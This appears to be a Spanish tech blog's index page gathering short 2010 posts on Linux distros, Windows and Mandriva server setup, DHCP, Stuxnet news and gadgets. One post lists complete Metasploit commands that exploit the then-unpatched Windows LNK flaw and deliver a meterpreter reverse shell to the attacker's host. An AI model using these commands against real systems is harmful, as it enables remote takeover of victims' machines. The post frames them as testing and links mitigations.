Un interesante artículo de Internet News nos revela cómo la NASA, uno de los organismos más importantes a nivel científico y tecnológico en todo el mundo,hace buen uso del software Open Source y de distribuciones Linux como Ubuntu.
Las 10 mejores distros de 2010 según TechRadar
En MyLinux han publicado un articulo sobre las mejores distribuciones del 2010 segun TechRadar. aunque ami personalmente no convence del todo el listado, pienso igual que ellos, para gustos los colores
Instalar Mandriva Enterprise Server y Administrar graficamente Controlador de Dominio Principal (PDC)
Nunca había instalado un Mandriva, y la verdad… que a la hora de la instalación es muy sencilla y muy intuitiva. Y es mi primera vez con un Server bajo GNU/Linux con interfaz grafica.
Herramientas a utilizar:Oracle VM Virtualbox ( En mi caso voy a virtualizar el servidor)
Mandriva Enterprise Server 5
Cliente Windows
Descargar Mandriva Enterprise ServerExplotando «LNK» con MetaSploit
MetaSploit nuevamente tiene un PoC para una vulnerabilidad que todavía no posee un parche de corrección de Microsoft.
Para testear esta vulnerabilidad primero debemos actualizar el framework con «svn update», y luego hacemos lo siguiente:
use windows/browser/ms10_xxx_windows_shell_lnk_execute
set SRVHOST 192.168.162.136
set SRVPORT 80
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.162.136
set LPORT 443
exploit
De esta forma vamos a levantar un servidor web en el puerto 80, que cuando la víctima lo visite, nos dará una shell de meterpreter a través del puerto 443. Funciona muy bien!
Todavía no hay un parche de seguridad de Microsoft para corregir este problema, pero pueden encontrar algunos workarounds a continuación:
Microsoft Security Advisory (2286198)
– Security By Default: Solución a la vulnerabilidad «LNK» de Windows mediante Directivas de Restricción de Software
Fuente: http://www.kungfoosion.com/
La nueva variante del Stuxnet vuelve a estar firmada con un certificado válid
El último ataque contra Windows (con enlaces directos) fue descubierto a través de un troyano que ha sido bautizado como Stuxnet. Una de sus características era que los drivers que usaba estaban firmados digitalmente por la famosa empresa china Realtek. Ahora, después de que hayan sido revocados, los atacantes han comenzado a utilizar los de otra empresa legítima: JMicron Technology Corporation.
Los drivers de Stuxnet utilizados como rootkit, estaban firmados digitalmente por la famosa empresa china Realtek. Esto significa que, en principio, solo Realtek puede ser responsable de ese código… excepto que su clave privada haya sido comprometida de alguna forma, cosa que no se ha confirmado todavía. En cualquier caso, Microsoft ha trabajado con Verisign para revocar en sus sistemas los certificados (con el apoyo de Realtek también). Parece que ante este «contratiempo» los atacantes han reaccionado firmando su troyano de nuevo con un certificado válido de otra empresa Taiwanesa dedicada también a crear controladores, llamada JMicron.
Instalar un controlador de dominio secundario
Bueno, ya anteriormente había publicado como instalar un controlador de dominio principal (PDC) y adicional (CDA)
Instalar un controlador de dominio principal
Instalar un controlador de dominio adicional
Ahora vamos a integrarle un controlador de dominio secundario, al que llamaremos CDS
Herramientas necesarias para montar CDS
Virtualbox: Para virtualizar nuestro CDS.
Sistema operativo: Windows 2003 Server Enterprise Edition.
Tener instalado: Controlador de domino Principal y Adicional.
Interesante (y peligroso) troyano que aprovecha un interesante 0 day en Microsoft Windows
Se ha descubierto un nuevo ataque contra Windows, que aprovecha una vulnerabilidad previamente desconocida. Lo interesante (y peligroso) en este caso, es que esta vulnerabilidad ha sido utilizada como nuevo método «revolucionario» para eludir la desactivación de AutoRun y ejecutarse bajo cualquier circunstancia cuando se inserta en el sistema una memoria USB extraíble, por ejemplo. Además, el troyano ha sido firmado digitalmente por una compañía legítima.
Cómo ha sido descubierto
VirusBlokAda descubrió, ya el 17 de junio (lo que da una idea de la posible cantidad de tiempo que esta amenaza lleva atacando silenciosamente) módulos de un malware nuevo. Pasadas unas semanas, alertaron sobre algo realmente inusual en este troyano: su forma de propagarse a través de memorias USB prescindiendo del tradicional archivo autorun.inf, que permite la ejecución automática cuando se detecta un dispositivo extraíble y funcionalidad contra la que Microsoft lleva tiempo luchando.
LG R590, primer portátil 3D del fabricante con Windows 7
Uno de los fabricantes más innovadores pretende lanzar su primer portátil con tecnología 3D al mercado asiático en unos días.
Microsoft patenta un nuevo mando para Xbox 360
Se trata de un híbrido: inalámbrico y cable, según lo decida el jugador.
A principios de año Microsoft intentó patentar una nueva tecnología en la oficina de patentes de los Estados Unidos. Finalmente esta semana parece haber sido aprobada y, a tenor de lo que se ha liberado, se trataría de una tecnología relacionada con un nuevo mando híbrido, «dual», para Xbox 360. Según puede verse en el esquema, el nuevo mando incluiría opción de usarse con o sin cable, de forma completamente automática y sin retardos.
Instalar servidor DHCP en Debian
Antes de empezar a instalar, vamos a recordar algunos conceptos básicos pero importantes.
DHCP ( Dynamic Host Configuration Protocol – Protocolo Dinámico de Configuración de Anfitrión)
Se trata de un protocolo de tipo cliente/servidor en el que generalmente un servidor posee una lista de direcciones IP dinámicas y las va asignando a los clientes conforme éstas van estando libres, sabiendo en todo momento quién ha estado en posesión de esa IP, cuánto tiempo la ha tenido y a quién se la ha asignado después.
ESCUCHA POR EL PUERTO: 68 UDP
TRABSNUTE POR EL PUERTO: 67 UDP
Que es un Agente de Retransmisión DHCP: Es un software que retransmite mensajes DHCP y BOOTP entre clientes y servidores en diferentes subredes.